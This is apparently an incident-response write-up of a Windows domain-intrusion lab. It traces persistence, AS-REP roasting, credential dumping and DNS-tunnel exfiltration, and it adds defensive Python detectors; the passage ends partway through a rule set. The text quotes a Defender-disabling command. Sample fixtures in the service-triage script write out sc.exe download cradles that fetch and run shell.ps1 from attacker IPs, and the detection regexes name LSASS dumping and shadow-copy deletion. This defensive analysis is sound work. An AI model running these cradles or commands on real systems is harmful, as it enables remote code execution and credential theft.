# Investigating Windows Scenario

After successfully executing a phishing attack, the threat actor tricked an employee into downloading a malicious executable file, gaining control over the victim's machine.

The attacker disabled Windows Defender real-time monitoring with **Set-MpPreference -DisableRealtimeMonitoring $true**, most likely to avoid detection of the malware deployment and data exfiltration that followed. This cmdlet requires local administrator rights. Two checks are worth making here: Tamper Protection, when enabled, blocks this change even for administrators, and Defender records a successful change as Event ID 5001 (real-time protection disabled) in the Microsoft-Windows-Windows Defender/Operational log, so that event, rather than the process-creation record, is the evidence that the change actually took effect.

<figure><img src="/files/Y0pEuVBzh5f1JGmjevgD" alt=""><figcaption></figcaption></figure>

The attacker then attempted to establish persistence by creating a service named **svehosts** (a look-alike of the legitimate **svchost** name) and used it to download a file called **shell.ps1** onto the system.

```kql
(powershell or cmd) and "WEINNOVATE"
```

<figure><img src="/files/cciXRtnNVRQznYXFBPZn" alt=""><figcaption></figcaption></figure>

This command **creates a malicious Windows service** whose binary path is `cmd.exe` rather than a real service executable, so every start of the service downloads and executes a PowerShell script from the attacker's server.

When the system starts, the service:

* Launches `cmd.exe`.
* Executes **PowerShell** to download `shell.ps1` from `192.168.1.100`.
* Runs the **malicious PowerShell script**, potentially establishing **remote access**.

Two points help when hunting this. `cmd.exe` does not speak the service control protocol, so the Service Control Manager reports the service as failed to start (error 1053) once its timeout expires, but by then the download cradle has already executed; a service that "fails" on every boot is therefore itself a signal. The installation is also recorded independently of the process-creation event, as System Event ID 7045 (a service was installed) and, when auditing is enabled, Security Event ID 4697.

The attacker then created a second service named "update" that duplicated the behaviour of the "svehosts" service, giving them a second persistence point.

```kql
(powershell or cmd) and "WEINNOVATE"
```

<figure><img src="/files/QPlmw7ZAdtOsgs7pmz6m" alt=""><figcaption></figcaption></figure>

Next, the attacker attempted to reconfigure an existing Windows service (recorded as `notepad.exe` in the event) so that it would run a malicious PowerShell command at system startup.

<figure><img src="/files/taTtFR1gIB3IhJqM0VWn" alt=""><figcaption></figcaption></figure>

This command rewrites the service's binary path (its `binPath`), so the service no longer runs its original executable. Instead it runs a PowerShell command that downloads `shell.ps1` from `192.168.100.24` and executes it, potentially establishing a reverse shell. Hijacking an existing service rather than creating a new one also avoids the 7045 service-installation event, so the change is visible only in the process-creation record of the reconfiguration command and in the service's `ImagePath` value under `HKLM\SYSTEM\CurrentControlSet\Services`.
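
The two service abuses above (a new service with an interpreter as its binary, and an existing service whose `binPath` is rewritten) can be picked out of process-creation data by parsing the `sc.exe` syntax rather than grepping for `powershell`. The following Python script is an added example written for this page, not tooling from the report's authors; the sample command lines at the bottom are constructed to mirror the write-up, and their exact quoting and download cradle are assumed.

```python
import re

# Cradle markers: an sc.exe binPath that invokes an interpreter AND one of
# these is fetching code at service start. Constructed list, not exhaustive.
CRADLE_RE = re.compile(
    r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|invoke-expression|"
    r"iex|webclient|bitsadmin|certutil|curl|wget)\b",
    re.IGNORECASE,
)
INTERPRETER_RE = re.compile(r"\b(cmd|powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b", re.IGNORECASE)
# sc.exe's verb is 'create' (new service) or 'config' (change an existing one);
# an optional \\server argument may precede the verb.
SC_RE = re.compile(
    r"\bsc(?:\.exe)?\s+(?:\\\\\S+\s+)?(?P<verb>create|config)\s+(?P<svc>\S+)\s+(?P<rest>.*)",
    re.IGNORECASE | re.DOTALL,
)
# sc.exe quirk: the space goes AFTER the '=' ('binPath= "..."').
BINPATH_RE = re.compile(r'binpath=\s*(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))', re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.IGNORECASE)


def triage_service_command(cmdline):
    """Return a finding for an 'sc create|config ... binPath=' command line whose
    service binary is an interpreter running a download cradle, else None."""
    m = SC_RE.search(cmdline)
    if not m:
        return None
    bp = BINPATH_RE.search(m.group("rest"))
    if not bp:
        return None
    binpath = bp.group("quoted") if bp.group("quoted") is not None else bp.group("bare")
    cradle = sorted({c.lower() for c in CRADLE_RE.findall(binpath)})
    if not (INTERPRETER_RE.search(binpath) and cradle):
        return None
    return {
        "verb": m.group("verb").lower(),       # create = new service, config = hijacked one
        "service": m.group("svc"),
        "binpath": binpath,
        "urls": URL_RE.findall(binpath),
        "autostart": re.search(r"start=\s*auto", m.group("rest"), re.IGNORECASE) is not None,
        "cradle": cradle,
    }


def scan_command_lines(lines):
    """Apply the triage to a batch of process command lines (e.g. 4688 records)."""
    return [f for f in map(triage_service_command, lines) if f]


# Constructed 4688-style command lines mirroring the write-up; the exact
# quoting and cradle wording are assumed, not taken from the original events.
SAMPLE_COMMAND_LINES = [
    "sc create svehosts binPath= \"cmd.exe /c powershell -nop -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://192.168.1.100/shell.ps1')\" start= auto",
    "sc create update binPath= \"cmd.exe /c powershell -nop -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://192.168.1.100/shell.ps1')\" start= auto",
    "sc config notepad binPath= \"powershell -w hidden -c Invoke-WebRequest http://192.168.100.24/shell.ps1"
    " -OutFile C:\\Windows\\Temp\\shell.ps1; powershell -f C:\\Windows\\Temp\\shell.ps1\"",
    "sc query wuauserv",                                                           # benign: no verb of interest
    "sc create Spooler2 binPath= \"C:\\Windows\\System32\\spoolsv.exe\" start= auto",  # real binary, no cradle
]

if __name__ == "__main__":
    for finding in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(finding)
```

Feeding it the command-line field of every 4688 or Sysmon Event 1 record for `sc.exe` gives one finding per service creation or hijack, with the fetched URL extracted so it can be pivoted on in proxy or DNS logs; `verb == "config"` is the hijack case that produces no 7045 event. Nested double quotes inside a `binPath` are not handled by this simple regex and would need a proper tokenizer.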

Then, the attacker set up an HTTP server and used the `Invoke-WebRequest` PowerShell cmdlet to download a file named ***scvhost.exe*** onto the compromised system. The name is a transposition of the legitimate `svchost.exe`, a masquerading trick (MITRE ATT&CK T1036.005) meant to survive a casual look at the process list.

```kql
http OR https
```

<figure><img src="/files/OFS7q8ajmaQ57QaIR0Zv" alt=""><figcaption></figcaption></figure>

The attacker attempted to download an executable named **scvhost.exe** and save it to **C:\Program Files**, a location that standard users cannot write to, which again indicates the attacker held administrative rights on the host.

We then applied a filter for this executable file to analyze the attacker's actions and determine its intended purpose.

```kql
"scvhost.exe"
```

<figure><img src="/files/oFmNKzF3KQAHWSM3iGGb" alt=""><figcaption></figcaption></figure>

Filtering on the binary shows that **scvhost.exe** was used for an AS-REP Roasting attack against the Active Directory environment (MITRE ATT&CK T1558.004). The tool:

* **enumerates Active Directory accounts** that have the `Do not require Kerberos preauthentication` setting enabled;
* requests an AS-REP for each of them and extracts the part encrypted with the account's password-derived key (the **AS-REP hash**);
* saves the hashes in **Hashcat format** (`$krb5asrep$23$user@REALM:...`, Hashcat mode 18200 for the RC4/etype 23 case) for offline **password cracking**;
* which lets the attacker brute-force weak passwords with **Hashcat** without any further contact with the domain controller.

Because no failed logons are generated, the only domain-side trace is a Kerberos authentication ticket request (Security Event ID 4768) with pre-authentication type 0 for each roasted account.
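
When the hash file itself is recovered from the host (here *hashes.txt*, and later *updates.txt*), the first response task is to list which accounts were roasted so their passwords can be reset whether or not cracking succeeded. The Python below is an added example written for this page, not part of the report; it parses Rubeus/Impacket Hashcat-format lines as well as john-format lines, and the sample file is constructed with filler hex, not real Kerberos material.

```python
import re

# Rubeus (/format:hashcat) and Impacket GetNPUsers write
#   $krb5asrep$23$user@REALM:<32 hex checksum>$<hex encrypted data>
# john's format omits the '23$' etype field. Both are accepted here.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?(?P<user>[^@:$\s]+)@(?P<realm>[^:\s]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$",
    re.IGNORECASE,
)
# Only the RC4 (etype 23) AS-REP format is mapped; AES AS-REP hashes use a different layout.
HASHCAT_MODE = {23: 18200}


def parse_asrep_hashes(text):
    """Parse a hashes.txt-style file. Returns (parsed, rejected): parsed entries
    carry the account, realm and etype; rejected holds (line_no, prefix) for
    lines that are not well-formed AS-REP hashes."""
    parsed, rejected = [], []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        m = ASREP_RE.match(line)
        if not m:
            rejected.append((line_no, line[:40]))
            continue
        etype = int(m.group("etype")) if m.group("etype") else 23  # john format: etype implied
        parsed.append({
            "line": line_no,
            "user": m.group("user"),
            "realm": m.group("realm").upper(),
            "etype": etype,
            "hashcat_mode": HASHCAT_MODE.get(etype),
            "edata_bytes": len(m.group("edata")) // 2,
        })
    return parsed, rejected


def affected_accounts(parsed):
    """Unique user@REALM set: these accounts need a password reset and a review
    of why pre-authentication was disabled, whether or not cracking succeeded."""
    return sorted({f"{p['user']}@{p['realm']}" for p in parsed})


# Constructed sample file: the account names are illustrative and the hex
# fields are filler, not real Kerberos material.
_CHK, _DATA = "a1" * 16, "b2" * 40
SAMPLE_HASHES_TXT = "\n".join([
    f"$krb5asrep$23$backup_svc@WEINNOVATE.LOCAL:{_CHK}${_DATA}",
    f"$krb5asrep$23$helpdesk@weinnovate.local:{_CHK}${_DATA}",
    f"$krb5asrep$backup_svc@WEINNOVATE.LOCAL:{_CHK}${_DATA}",   # john-style duplicate of line 1
    "",
    "[*] AS-REP hash:",                                         # tool banner text, not a hash
])

if __name__ == "__main__":
    parsed, rejected = parse_asrep_hashes(SAMPLE_HASHES_TXT)
    print(affected_accounts(parsed), rejected)
```

The rejected list matters as much as the parsed one: tool banners and truncated lines in a recovered file are common, and a line that almost parses may indicate a format (for example an AES etype) that the responder has not accounted for.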

The attacker then attempted to script an FTP session to `192.168.200.124` on port `4444` and, from within that session, to execute `cmd.exe`. `ftp.exe` runs any line prefixed with `!` as a local shell command, so a scripted FTP session (typically `ftp -s:<file>`) is a known living-off-the-land way to launch commands from a trusted Microsoft binary, and an FTP connection to a non-standard port such as 4444 is more consistent with a reverse shell or an exfiltration channel than with a legitimate file transfer.

```kql
(powershell or cmd) and "WEINNOVATE"
```

<figure><img src="/files/wO5HyI2rzpT5xKkR632b" alt=""><figcaption></figcaption></figure>

He then tried to establish a reverse shell again, this time passing the command to PowerShell as a Base64 string via `-EncodedCommand`, which hides the payload from simple keyword searches on the command line.

```kql
process.name: "powershell.exe" AND process.args: "-EncodedCommand"
```

<figure><img src="/files/XdwY667gl3pWJwckBHN0" alt=""><figcaption></figcaption></figure>

We extracted the Base64 string and decoded it with CyberChef. Since `-EncodedCommand` expects the script as UTF-16LE text, the recipe is *From Base64* followed by *Decode text* with the UTF-16LE encoding; decoding as UTF-8 instead yields a string with a null byte after every character.

<figure><img src="/files/fNYvXgWuWMZOJa0ms86E" alt=""><figcaption></figcaption></figure>

The attacker then attempted to establish a reverse shell to port 4444 before switching to port 8080.

<figure><img src="/files/fTdG3NDPWgEyk2dH2trv" alt=""><figcaption></figcaption></figure>

Next, the attacker ran PowerShell with the execution policy set to bypass, so script files would run regardless of the configured policy. The execution policy is not a security boundary: it is a safeguard against accidental script execution and can be overridden per process by any user with `-ExecutionPolicy Bypass`, so its presence on a command line is a useful indicator, but the bypass itself is not a privilege escalation.

After this, he attempted to enumerate Active Directory users who do not require Kerberos pre-authentication, that is, accounts with the DONT_REQ_PREAUTH flag (0x400000) set in `userAccountControl`.

```kql
(powershell or cmd) and "WEINNOVATE"
```

<figure><img src="/files/DSTBUXkUQpfYWcOUiqMv" alt=""><figcaption></figcaption></figure>

The attacker then attempted to download a tool named **Rubeus** from the HTTP server they configured, saving it to the `C:\Temp` directory.

<figure><img src="/files/gZnjBThPziCT2m97tve7" alt=""><figcaption></figcaption></figure>

The attacker downloaded this tool to perform AS-REP Roasting but did not run it immediately. Instead, they first established persistence by creating user accounts and scheduled tasks. Let's examine this further.

Next, the attacker created a user named "admin" (Security Event ID 4720, a user account was created).

```kql
event.code: 4720 AND "WEINNOVATE"
```

<figure><img src="/files/XKTfBEmIbag4V3lipNbh" alt=""><figcaption></figcaption></figure>

He then attempted the AS-REP Roasting attack again, this time with Rubeus (which implements it as its `asreproast` action), extracting the hashes and saving them to a file named *hashes.txt*.

```kql
event.code:4688 and "WEINNOVATE"
```

<figure><img src="/files/B1yKeK1LOm5gX8FJG1db" alt=""><figcaption></figcaption></figure>

Next, the attacker established persistence by creating a scheduled task named **"WindowsUpdate"**, configured to run every five minutes and execute a file named **"Windows\_Update.exe"**.

The task **runs as the SYSTEM account** (LocalSystem), which is more privileged than a local administrator: it is not subject to UAC and has full access to the machine. A task that re-runs a binary every five minutes is effectively a beacon. The creation is recorded as Security Event ID 4698 (a scheduled task was created), whose `TaskContent` field holds the full task XML, including the trigger interval, the run-as principal and the command.

<figure><img src="/files/NG19pi6txtzT8Rj69Mg7" alt=""><figcaption></figcaption></figure>
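
Security Event ID 4698 carries the full task definition as XML, which is enough to score a task without touching the host. The Python below is an added example for this page, not the report's own analysis; the task XML is constructed to match the description above (the binary path is assumed, since the report gives only the file name), and a benign task is included for contrast. The same check applies to the second WindowsUpdate task created later in the intrusion.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_PRINCIPALS = {"S-1-5-18", "SYSTEM", "LOCALSYSTEM", "NT AUTHORITY\\SYSTEM"}
# Directories any local user can write to: a persistence binary living here is a red flag.
USER_WRITABLE = (r"c:\users\public", r"c:\windows\temp", r"c:\temp", r"\appdata\local\temp", r"c:\programdata")
INTERPRETER_RE = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?$", re.IGNORECASE)


def iso8601_minutes(duration):
    """Task Scheduler durations look like P1DT2H30M or PT5M; return minutes or None."""
    if not duration:
        return None
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", duration)
    if not m:
        return None
    days, hours, mins, secs = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def triage_task_xml(task_xml):
    """Score the TaskContent XML carried by Security Event 4698."""
    # 4698 embeds an '<?xml ... encoding="UTF-16"?>' declaration; strip it so the
    # already-decoded str parses cleanly.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml))

    def text(path):
        el = root.find(path, TASK_NS)
        return el.text.strip() if el is not None and el.text else None

    principal = text(".//t:Principals/t:Principal/t:UserId")
    interval = iso8601_minutes(text(".//t:Repetition/t:Interval"))
    command = text(".//t:Actions/t:Exec/t:Command")
    arguments = text(".//t:Actions/t:Exec/t:Arguments")

    reasons = []
    if principal and principal.upper() in SYSTEM_PRINCIPALS:
        reasons.append("runs as LocalSystem")
    if interval is not None and interval <= 15:
        reasons.append(f"repeats every {interval:g} min (beacon-like)")
    if command and any(d in command.lower() for d in USER_WRITABLE):
        reasons.append("binary in a user-writable directory")
    if command and INTERPRETER_RE.search(command):
        reasons.append("action is an interpreter/LOLBin")
    return {"principal": principal, "interval_min": interval, "command": command,
            "arguments": arguments, "reasons": reasons, "suspicious": len(reasons) >= 2}


# Constructed TaskContent for the write-up's WindowsUpdate task; the binary path is
# assumed (the report gives only the file name) and the date is filler.
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT5M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-01-15T10:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Users\Public\Windows_Update.exe</Command></Exec>
  </Actions>
</Task>"""

# A benign-looking task for contrast: daily, runs as a named service account, vendor path.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-15T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>WEINNOVATE\svc_backup</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\backup.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(triage_task_xml(SAMPLE_TASK_XML))
    print(triage_task_xml(BENIGN_TASK_XML))
```

Requiring two independent reasons keeps legitimate SYSTEM tasks (which are common) from flooding the queue; the combination of LocalSystem, a minute-scale repetition and a binary under `C:\Users\Public` is what separates this task from the hundreds of built-in ones.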

We also identified a randomly named pipe (`wnqufs`). A named pipe is not a persistence mechanism in itself; it is an inter-process communication channel, and a short random pipe name created by a process that has no business creating pipes is typical of command-and-control implants passing a shell or data between stages. Sysmon records pipe creation and connection as Event IDs 17 and 18 when that filter is enabled.

<figure><img src="/files/FEHZ3uaVgRJ2UasqKymW" alt=""><figcaption></figcaption></figure>

He then attempted the AS-REP Roasting attack again using the `scvhostt.exe` executable, storing the extracted hashes in the Temp directory.

After completing the attack, he opened the file ***updates.txt*** to check whether any AS-REP hashes had been collected that could be cracked to recover a password.

<figure><img src="/files/4UoobJrqK02YdAz0E231" alt=""><figcaption></figcaption></figure>

The attacker then attempted network enumeration by executing commands such as `ipconfig` to display network configuration details and `arp -a` to retrieve the ARP table.

<figure><img src="/files/1ANpZg54aEVscITw5KLV" alt=""><figcaption></figcaption></figure>

Next, the attacker attempted to dump the memory of the `lsass.exe` process (Local Security Authority Subsystem Service), which holds the credentials of every logged-on session, and saved it as a file named *lsass.dump* (MITRE ATT&CK T1003.001). Whatever t
ool is used, the dump requires opening LSASS with read access, which Sysmon records as Event ID 10 (ProcessAccess) together with the `GrantedAccess` mask, and the dump file itself can be parsed offline with Mimikatz or pypykatz to recover plaintext passwords, NT hashes and Kerberos tickets.

<figure><img src="/files/hzuPpzFpeLiwv56myzBM" alt=""><figcaption></figcaption></figure>

The attacker then attempted to complete the enumeration process by listing all local user accounts using the `net users` command and identifying all visible computers on the network with the `net view` command.

<figure><img src="/files/AJgkCBruELVULj0hThQM" alt=""><figcaption></figcaption></figure>

Next, the attacker attempted to identify hosts for lateral movement by using the `ping` command to determine which addresses were responsive.

<figure><img src="/files/rcqGm7iwk9gFwVKAZE0H" alt=""><figcaption></figcaption></figure>

Afterward, the attacker identified a host with the IP address **10.20.10.17** that responded to their requests. They then retrieved that machine's hostname and checked their privilege level on it.

We believe he obtained the Administrator account's password by cracking the AS-REP hash he acquired during the AS-REP Roasting attack.

<figure><img src="/files/bPwGiAow9YRmuKlAR2hC" alt=""><figcaption></figcaption></figure>

The attacker attempted to download a file named **Services.exe** and saved it to the following path: **C:\Users\Public\Services.exe**.

<figure><img src="/files/Gmk8itjcv08DmIhy5Jb3" alt=""><figcaption></figcaption></figure>

He then prepared for data exfiltration by archiving all files from the Documents and Desktop folders of all user accounts, saving the compressed data as a ZIP file named ***backup.zip*** in the *Public* folder.

<figure><img src="/files/66OaUHxt8ajuPiI13DI8" alt=""><figcaption></figcaption></figure>

He then downloaded a file named **explorer.exe** onto the domain controller and saved it in **C:\Windows\Temp\explorer.exe**.

<figure><img src="/files/tkg3hvgaCVCNNZCUIDLW" alt=""><figcaption></figcaption></figure>

He then attempted to enumerate all user accounts within the Active Directory domain before creating a new user account named **"systen"** (a look-alike of "system") with the password `p@ssw0rd`.

<figure><img src="/files/vOsht66WLN77uE2sZA2a" alt=""><figcaption></figcaption></figure>

Next, the attacker attempted to retrieve a list of users belonging to the "Domain Admins" group within the Active Directory (AD) domain. Subsequently, they added the previously created user, "systen," to the local Administrators group on the compromised system.

<figure><img src="/files/LkDuEXAfMgOQH4k5ebjH" alt=""><figcaption></figcaption></figure>

He then used **ntdsutil**, a built-in Windows utility, to create a full copy of the **Active Directory database (NTDS.DIT)**, storing it in **C:\Windows\Temp\backup** (MITRE ATT&CK T1003.003). `ntdsutil` is the supported way to produce an Install From Media (IFM) set, which is why it legitimately appears during domain-controller promotions, but any invocation that writes the database to a temporary directory on a compromised controller should be treated as credential theft.

<figure><img src="/files/TceyU0wBNzk1yYQqLXxR" alt=""><figcaption></figcaption></figure>

We believe the attacker returned to the PC10 device and used **Robocopy**, the built-in command-line copy tool, to collect user documents. The files were copied to **C:\Users\Public\backup**, a directory readable and writable by every local account, staging the data for later exfiltration (MITRE ATT&CK T1074.001).

<figure><img src="/files/GAi9QVrVnvU2HMdqduW3" alt=""><figcaption></figcaption></figure>

He then attempted to download a file named **update.exe** to the domain controller, saving it in the **Temp** directory under the same name.

<figure><img src="/files/uHrAdKxlgkVNiLY7iTsp" alt=""><figcaption></figcaption></figure>

The attacker then used WinRAR to compress and password-protect the **NTDS.dit** file together with the **SYSTEM** registry hive, saving the archive as **C:\Windows\Temp\backup.rar**. The hive is not an afterthought: the boot key stored in SYSTEM is needed to decrypt the password encryption key inside NTDS.dit, so the two files together are all that is required to extract every domain account's password hash offline (for example with Impacket's `secretsdump.py -ntds ... -system ...`), which in turn enables pass-the-hash and further privilege escalation.

<figure><img src="/files/D1KpHWQacVXUfYEKw085" alt=""><figcaption></figcaption></figure>

The attacker then executed a **PowerShell command** to recursively search user directories for **text, CSV, Excel, and Word documents** containing keywords like **"password," "pass," "pwd," or "credentials,"** to steal stored credentials or sensitive information.

<figure><img src="/files/5Y8LON25TfEwtGLLHpnT" alt=""><figcaption></figcaption></figure>

Then he completed his enumeration of the host by executing commands such as `tree`, `whoami` and `diskpart`. These are local host-discovery commands rather than Active Directory enumeration:

<figure><img src="/files/TWNULdGYGlRDzoQUwhX0" alt=""><figcaption></figcaption></figure>

* **`tree`** lists the directory structure, which helps an attacker understand the file system layout and locate sensitive files.
* **`diskpart`** lists disks, partitions and volumes, including volumes with no drive letter and removable media; it does not show network shares, but it can reveal additional volumes worth searching or suitable for staging data.
* **`whoami`** shows the current user; with `/groups` or `/all` it also shows group memberships and privileges, which tells the attacker what level of access they have.

Next, he utilized WinRAR to compress the contents of the `C:\DATA` directory into an archive named `Doms.rar`.

<figure><img src="/files/3UYtEkdo4zEoOXueLYse" alt=""><figcaption></figcaption></figure>

He then completed the enumeration by searching for sensitive information within text-based files and scanning the *C:\\* directory for sensitive data and scripts.

<figure><img src="/files/SUTLr29rycFqibOMrB5r" alt=""><figcaption></figcaption></figure>

He then created a scheduled task named **WindowsUpdate**, configured to run every five minutes, as a persistence mechanism.

<figure><img src="/files/FfnciPHKbgT4iVmHgStt" alt=""><figcaption></figcaption></figure>

The attacker proceeded to enumerate all domain users to gather information on usernames and their associated descriptions.

<figure><img src="/files/5XIQooFcHingsYWlOsua" alt=""><figcaption></figcaption></figure>

He then attempted to enumerate all stored credentials on the Windows system.

<figure><img src="/files/o2C6Qtn8fAlgSZFo83K6" alt=""><figcaption></figcaption></figure>

He then downloaded **dnscat2**, a DNS tunnelling client/server pair, to exfiltrate the collected data over DNS (MITRE ATT&CK T1071.004).

<figure><img src="/files/lU6BwQAghgcSaYqeOFUY" alt=""><figcaption></figcaption></figure>

After downloading the dnscat2 tool, he manually set the DNS server of the "Ethernet" interface to 192.168.100.179 (the attacker's IP address). Pointing the resolver directly at the attacker's host is consistent with dnscat2's direct mode, in which the client sends its queries straight to the server on UDP/53 and no registered domain is required; it also means every DNS query from the host now bypasses the corporate resolver, which is itself a strong detection signal (DNS traffic from a workstation to a non-approved server).

<figure><img src="/files/VCyl0GrYfrg6PoJePnvn" alt=""><figcaption></figcaption></figure>

He disabled real-time monitoring on the PC10 machine, which was the initial point of compromise.

<figure><img src="/files/WTLAkhQ4zaBW8JuvcBbx" alt=""><figcaption></figcaption></figure>

Next, the attacker began exfiltrating the acquired data, compressing it, and transmitting it to the IP addresses **192.168.100.179** and **192.168.100.24** using DNS tunneling.

<figure><img src="/files/A7asadn90QlKXn8lfV9u" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dnxHZZoxIB1y5LWF7SDx" alt=""><figcaption></figcaption></figure>

Here, the attacker attempted to exfiltrate data using the **dnscat** client (the client half of dnscat2).

<figure><img src="/files/PbAUqHI405JCMpQmdKWP" alt=""><figcaption></figcaption></figure>
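
dnscat2 traffic has a recognisable shape in DNS logs: long hex-encoded subdomains, almost no repeated queries, heavy use of TXT/CNAME/MX records and, in this case, a resolver that is not the corporate DNS server. The Python below is an added example for this page, not the authors' detection content; the log sample is constructed (the workstation IP, corporate resolver and `c2.example` domain are assumed) and the payload labels are filler hex derived from SHA-256, not real dnscat2 data.

```python
import hashlib
import math
import re
from collections import Counter, defaultdict

APPROVED_RESOLVERS = {"10.20.10.1"}             # assumed corporate DNS server
TUNNEL_QTYPES = {"TXT", "CNAME", "MX", "NULL"}    # record types dnscat2 rotates through
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{16,63}$")   # dnscat2 hex-encodes its payload into labels


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def split_qname(qname, base_labels=2):
    """('c2.example', ['deadbeef...']) for 'deadbeef....c2.example.'"""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-base_labels:]), labels[:-base_labels]


def score_dns_log(records, min_queries=10):
    """records: (src_ip, qname, qtype, resolver_ip). Returns one finding per
    (source, base domain) pair that shows at least two tunnelling traits."""
    groups = defaultdict(list)
    for src, qname, qtype, resolver in records:
        base, sub = split_qname(qname)
        groups[(src, base)].append((sub, qtype.upper(), resolver))

    findings = []
    for (src, base), rows in groups.items():
        if len(rows) < min_queries:
            continue
        n = len(rows)
        subs = [".".join(s) for s, _, _ in rows]
        hex_like = sum(bool(s) and all(HEX_LABEL_RE.match(l) for l in s) for s, _, _ in rows) / n
        mean_len = sum(map(len, subs)) / n
        mean_entropy = sum(map(shannon_entropy, subs)) / n
        unique_ratio = len(set(subs)) / n
        tunnel_types = sum(qt in TUNNEL_QTYPES for _, qt, _ in rows) / n
        rogue = sorted({r for _, _, r in rows} - APPROVED_RESOLVERS)

        reasons = []
        if hex_like >= 0.8:
            reasons.append("hex-encoded subdomains")
        if mean_len >= 30 and mean_entropy >= 3.5:
            reasons.append(f"long high-entropy subdomains (len {mean_len:.0f}, H {mean_entropy:.2f})")
        if unique_ratio >= 0.9:
            reasons.append("almost every query is unique (no caching benefit)")
        if tunnel_types >= 0.5:
            reasons.append("TXT/CNAME/MX/NULL heavy")
        if rogue:
            reasons.append(f"sent to non-approved resolver {rogue}")
        if len(reasons) >= 2:
            findings.append({"src": src, "domain": base, "queries": n, "reasons": reasons})
    return findings


# Constructed log: PC10 (IP assumed) doing normal lookups through the corporate
# resolver, then dnscat2-style traffic straight to the attacker's host. The
# tunnel payload is filler hex derived from SHA-256, not real dnscat2 data.
SAMPLE_DNS_LOG = [("10.20.10.10", "www.microsoft.com", "A", "10.20.10.1")] * 12
SAMPLE_DNS_LOG += [("10.20.10.10", q, "A", "10.20.10.1")
                   for q in ("login.microsoftonline.com", "outlook.office365.com", "dc01.weinnovate.local")]
SAMPLE_DNS_LOG += [
    ("10.20.10.10",
     hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:60] + ".c2.example",
     ("TXT", "CNAME", "MX")[i % 3],
     "192.168.100.179")
    for i in range(24)
]

if __name__ == "__main__":
    for f in score_dns_log(SAMPLE_DNS_LOG):
        print(f)
```

Two caveats: splitting on the last two labels is wrong for domains such as `co.uk` (use a public-suffix list in production), and the entropy threshold alone will also catch CDN and anti-virus signature lookups, which is why a finding needs at least two independent traits and why the rogue-resolver check is the most reliable signal for this particular intrusion.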

The attacker then tried to inhibit recovery by deleting all volume shadow copies (MITRE ATT&CK T1490), preventing restoration of files from previous versions and of system state from backups. Whether this is done with `vssadmin delete shadows`, `wmic shadowcopy delete` or the `Win32_ShadowCopy` WMI class, it leaves a process-creation event. Shadow-copy deletion is a standard precursor to ransomware deployment and has no legitimate interactive use on a workstation, so it warrants the highest-priority response.

<figure><img src="/files/mvgPtCuvDxjALnLcsUxo" alt=""><figcaption></figcaption></figure>
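
Looking back over the whole intrusion, most of the steps above (Defender disabled, execution policy bypassed, LSASS dumped, ntdsutil, account creation, WinRAR staging, resolver change, shadow-copy deletion) are recognisable from the process command line alone. The Python below is an added example for this page, not the authors' tooling; it applies a small rule set with MITRE ATT&CK tags to constructed process events (hostnames, users and timestamps are assumed, and the command lines are reconstructed from the narrative rather than copied from the original records) and produces the ordered timeline an incident report needs.

```python
import re

# Constructed rule set: each is (rule name, regex, ATT&CK technique). Tuned to the
# command shapes described in this write-up, not a general-purpose detection library.
RULES = [
    ("Defender real-time protection disabled",
     r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(?:\$true|1)\b", "T1562.001"),
    ("Execution policy bypassed",
     r"-(?:ExecutionPolicy|ep|ex)\s+(?:Bypass|Unrestricted)\b", "T1059.001"),
    ("LSASS memory dumped",
     r"comsvcs(?:\.dll)?\s*,\s*#?\s*(?:24|MiniDump)|procdump\S*\s.*\blsass|\blsass\.(?:dmp|dump)\b", "T1003.001"),
    ("NTDS.dit copied with ntdsutil",
     r"\bntdsutil\b.*(?:\bifm\b|create\s+full)", "T1003.003"),
    ("Shadow copies deleted",
     r"vssadmin\S*\s+delete\s+shadows|wmic\S*\s+shadowcopy\s+delete|Win32_ShadowCopy\b.*Delete", "T1490"),
    ("Account created",
     r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b|New-(?:AD|Local)User\b", "T1136"),
    ("Account added to Administrators",
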